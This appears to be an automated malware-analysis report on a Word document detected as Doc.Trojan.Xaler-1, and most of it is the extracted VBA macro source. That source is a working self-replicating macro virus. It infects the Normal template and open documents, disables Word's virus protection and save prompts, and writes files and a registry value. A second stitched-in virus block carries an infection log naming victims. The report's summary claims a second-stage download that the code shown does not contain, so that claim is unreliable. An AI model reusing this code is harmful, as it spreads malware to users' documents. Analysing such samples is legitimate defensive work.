MALICIOUS
150
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros, as indicated by multiple heuristics and ClamAV detection. The 'Document_Open' macro, named 'GOODSub', attempts to export its own code to 'C:\temp.tmp', then reads and processes this exported code. It appears to be designed to download and execute a second-stage payload, though the exact mechanism is obfuscated. The document body itself is a generic service contract, likely used as a lure.
Heuristics 4
-
ClamAV: Doc.Trojan.Xaler-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Xaler-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() Call GOODSub -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 492188 bytes |
SHA-256: 4f904aede6890fa40bed476cb2a37c6f37aaf2a595652ece5ba1a8051e271564 |
|||
|
Detection
ClamAV:
Doc.Trojan.Xaler-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'RELAX
Private Sub RELAX2()
End Sub
Private Sub Calendar1_Click()
End Sub
Private Sub Document_Close()
Call GOODSub
Call RELAX2
End Sub
Private Sub GOODSub()
On Error Resume Next
Application.ScreenUpdating = False
Application.Options.SaveNormalPrompt = False
x$ = "C:\temp.tmp"
MacroContainer.VBProject.VBComponents.Item("ThisDocument").Export x$
Open x$ For Input As #1
keimeno = Input(LOF(1), 1)
Close #1
kk& = InStr(1, keimeno, "'RELAX")
keimeno = Right$(keimeno, Len(keimeno) - kk& + 1)
For j = 1 To 2
If j = 1 Then
NormalTemplate.VBProject.VBComponents.Item("ThisDocument").Export x$
Else
ActiveDocument.VBProject.VBComponents.Item("ThisDocument").Export x$
End If
Open x$ For Input As #1
rlx = Input(LOF(1), 1)
Close #1
d1 = InStr(1, rlx, "'RELAX")
If d1 = 0 Then
If j = 1 Then
NormalTemplate.VBProject.VBComponents.Item("ThisDocument").CodeModule.InsertLines 1, keimeno
NormalTemplate.Save
Else
ActiveDocument.VBProject.VBComponents.Item("ThisDocument").CodeModule.InsertLines 1, keimeno
End If
End If
Next j
'====================
Dim PRostasia As Byte
PRostasia = 1
fff = FreeFile
If Dir(ActiveDocument.FullName, 6) <> "" Then
Open ActiveDocument.FullName For Binary As #fff
Put #fff, 862, PRostasia
Close #fff
ActiveDocument.Save
End If
Kill x$
Application.ScreenUpdating = True
End Sub
Private Sub Document_Open()
Call GOODSub
End Sub
Private Sub CommandButton1_Click()
ListBox1.Text1 = "a"
End Sub
' DSR & FHS , KZ, Kostanai
' KGU-EMF by DSR & FHS v0.1
()
On Error Resume Next
'Declare Variables
Dim SaveDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean
Dim ad, nt As Object
Dim OurCode, UserAddress, LogData, LogFile As String
'Initialize Variables
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
DocumentInfected = ad.CodeModule.Find("' DSR & FHS , KZ, Kostanai", 1, 1, 10, 10)
NormalTemplateInfected = nt.CodeModule.Find("' DSR & FHS , KZ, Kostanai", 1, 1, 10, 10)
'Switch the VirusProtection OFF, ConfirmConversion OFF, SaveNormalPrompt OFF
Options.VirusProtection = False
Options.ConfirmConversions = False
Options.SaveNormalPrompt = False
If (Day(Now()) <> 1) And (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = False) Then
If DocumentInfected = True Then
LogData = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
ElseIf NormalTemplateInfected = True Then
LogData = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
End If
LogData = Mid(LogData, InStr(1, LogData, "' Log" & "file -->"), Len(LogData) - InStr(1, LogData, "' Log" & "file -->"))
LogFile = LogFile + Mid(Str(Int(8 * Rnd)), 2, 1)
LogFile = "C:\bootlog" & LogFile & ".sys"
Open LogFile For Output As #1
Print #1, LogData
Close #1
Open "c:\netlog.sys" For Output As #1
Print #1, "For YOU"
Print #1, "SCOOTER"
Print #1, "Wellcome to Calipso"
Print #1, "FasterHarderScooter"
Print #1, "Scooter on the Web: www.scooterweb.de"
Print #1, "Wiritten by FHS & DSR (KZ, Kostanai town, KGU)"
Print #1, "This is a simple example"
Print #1, "read " & LogFile
Close #1
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = True
End If
'Make sure that some conditions are true before we continue infecting anything
If ((DocumentInfected = True) And _
(ActiveDocument.SaveFormat = wdFormatDocument Or _
ActiveDocument.SaveFormat = wdFormatTemplate)) Or _
((NormalTemplateInfected = True) And _
(ActiveDocument.SaveFormat = wdFormatDocument Or _
ActiveDocument.SaveFormat = wdFormatTemplate)) Then
'Infect the NormalTemplate
If DocumentInfected = True Then
SaveNormalTemplate = NormalTemplate.Saved
OurCode = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
'Write a log file of this NormalTemplate infection
For i = 1 To Len(Application.UserAddress)
If Mid(Application.UserAddress, i, 1) <> Chr(13) Then
If Mid(Application.UserAddress, i, 1) <> Chr(10) Then
UserAddress = UserAddress & Mid(Application.UserAddress, i, 1)
End If
Else
UserAddress = UserAddress & Chr(13) & "' "
End If
Next i
OurCode = OurCode & Chr(13) & _
"' " & "* DSR & FHS , KGU EMF" & Chr(13) & _
"' " & "00:15:54 - Wednesday, 22.12.1999" & Chr(13) & _
"' " & "KZ, Kostanai, KGU EMF Applied Mathematics" & Chr(13) & _
"' " & Format(Time, "hh:mm:ss - ") & _
Format(Date, "dddd, d mmm yyyy") & Chr(13) & _
"' " & Application.UserName & Chr(13) & _
"' " & UserAddress & Chr(13)
nt.CodeModule.deletelines 1, nt.CodeModule.CountOfLines
nt.CodeModule.AddFromString OurCode
If SaveNormalTemplate = True Then NormalTemplate.Save
End If
'Infect the ActiveDocument
If NormalTemplateInfected = True And _
DocumentInfected = False Then
SaveDocument = ActiveDocument.Saved
OurCode = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
ad.CodeModule.deletelines 1, ad.CodeModule.CountOfLines
ad.CodeModule.AddFromString OurCode
If SaveDocument = True Then ActiveDocument.Save
End If
End If
End Sub
' Logfile -->
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 19:20:14 - среда, 3 май 2000
' Пожелал остаться неизвестным
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 11:36:42 - воскресенье, 14 май 2000
' Khudyakov Yuriy
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 16:27:56 - понедельник, 15 май 2000
' Худякова
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 16:55:46 - вторник, 16 май 2000
' Худякова
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 10:25:20 - среда, 17 май 2000
' Худякова
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 10:48:08 - среда, 17 май 2000
' Худякова
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 10:53:13 - среда, 17 май 2000
' Худякова
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 15:46:39 - среда, 17 май 2000
' Худякова
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 15:10:05 - четверг, 18 май 2000
' Худякова
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 14:57:33 - вторник, 23 май 2000
' Худякова
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 16:42:02 - вторник, 23 май 2000
' Худякова
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 10:13:04 - среда, 24 май 2000
' Худякова
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 10:51:44 - суббота, 17 июн 2000
' Reanimator 98
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 10:56:16 - суббота, 17 июн 2000
' Reanimator 98
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 10:57:13 - суббота, 17 июн 2000
' Reanimator 98
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 12:11:33 - суббота, 17 июн 2000
' Reanimator 98
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 13:26:34 - понедельник, 19 июн 2000
' Reanimator 98
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 13:33:11 - вторник, 27 июн 2000
' С.Х. Есенбаев
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 14:13:47 - вторник, 27 июн 2000
' С.Х. Есенбаев
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 14:49:56 - среда, 28 июн 2000
' Indi G.Ospanova
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 14:12:22 - понедельник, 17 июл 2000
' Александр
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 14:16:56 - понедельник, 17 июл 2000
' Александр
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 18:26:40 - вторник, 18 июл 2000
' Александр
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 08:22:23 - четверг, 20 июл 2000
' Александр
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 10:33:06 - четверг, 20 июл 2000
' Александр
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 18:08:01 - четверг, 20 июл 2000
' Александр
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 10:34:42 - воскресенье, 23 июл 2000
' Александр
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 11:45:27 - воскресенье, 23 июл 2000
' Александр
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 11:53:05 - вторник, 25 июл 2000
' CCTT
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 08:53:34 - четверг, 27 июл 2000
' реаниматор
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 17:37:06 - вторник, 1 авг 2000
' Reanimator 99 CD
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 12:46:13 - среда, 2 авг 2000
' Reanimator 99 CD
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 18:22:38 - среда, 2 авг 2000
' Reanimator 99 CD
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 09:11:48 - понедельник, 21 авг 2000
' Reanimator 99 CD
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 15:01:19 - понедельник, 21 авг 2000
' Reanimator 99 CD
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 09:38:46 - вторник, 22 авг 2000
' Reanimator 99 CD
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 11:14:24 - пятница, 25 авг 2000
' Reanimator 99 CD
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 09:43:34 - пятница, 22 сен 2000
' Reanimator 99 CD
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 13:22:22 - пятница, 22 сен 2000
' Reanimator 99 CD
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 11:14:55 - вторник, 10 окт 2000
' 1
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 21:48:10 - четверг, 19 окт 2000
' 1
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 16:24:45 - среда, 29 ноя 2000
' 1
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 09:23:28 - четверг, 30 ноя 2000
' 1
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 11:58:47 - четверг, 30 ноя 2000
' 1
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 11:36:47 - пятница, 1 дек 2000
' 1
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 13:23:31 - пятница, 5 янв 2001
' Serg
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 11:54:34 - понедельник, 8 янв 2001
' Serg
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 14:36:35 - вторник, 9 янв 2001
' бвг¤
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 15:05:48 - вторник, 9 янв 2001
' бвг¤
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 18:23:03 - вторник, 9 янв 2001
' бвг¤
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 10:32:55 - среда, 10 янв 2001
' бвг¤
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 09:33:04 - пятница, 12 янв 2001
' бвг¤
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 13:48:13 - пятница, 12 янв 2001
' бвг¤
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 01:03:22 - понедельник, 15 янв 2001
' Jordan
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 18:08:12 - пятница, 2 фев 2001
' Serg
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 17:49:01 - пятница, 16 фев 2001
' Serg
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 13:12:13 - суббота, 17 фев 2001
' Alex
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 13:35:12 - суббота, 17 фев 2001
' Alex
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 13:35:19 - суббота, 17 фев 2001
' Alex
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 13:35:26 - суббота, 17 фев 2001
' Alex
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 13:35:31 - суббота, 17 фев 2001
' Alex
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 13:35:37 - суббота, 17 фев 2001
' Alex
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 13:35:44 - суббота, 17 фев 2001
' Alex
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 13:35:49 - суббота, 17 фев 2001
' Alex
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 13:35:55 - суббота, 17 фев 2001
' Alex
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 13:36:01 - суббота, 17 фев 2001
' Alex
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 13:45:17 - суббота, 17 фев 2001
' Alex
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 13:49:57 - суббота, 17 фев 2001
' Alex
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 14:40:56 - суббота, 17 фев 2001
' Alex
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 14:41:22 - суббота, 17 фев 2001
' Alex
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 16:51:31 - суббота, 17 фев 2001
' Alex
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 12:45:33 - понедельник, 19 фев 2001
' Alex
'
' * DSR & FHS , KGU EMF
' 00:15:54 - Wednesday, 22.12.1999
' KZ, Kostanai, KGU EMF Applied Mathematics
' 15:22:59 - понедельник, 19 фев 2001
' Alex
…
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.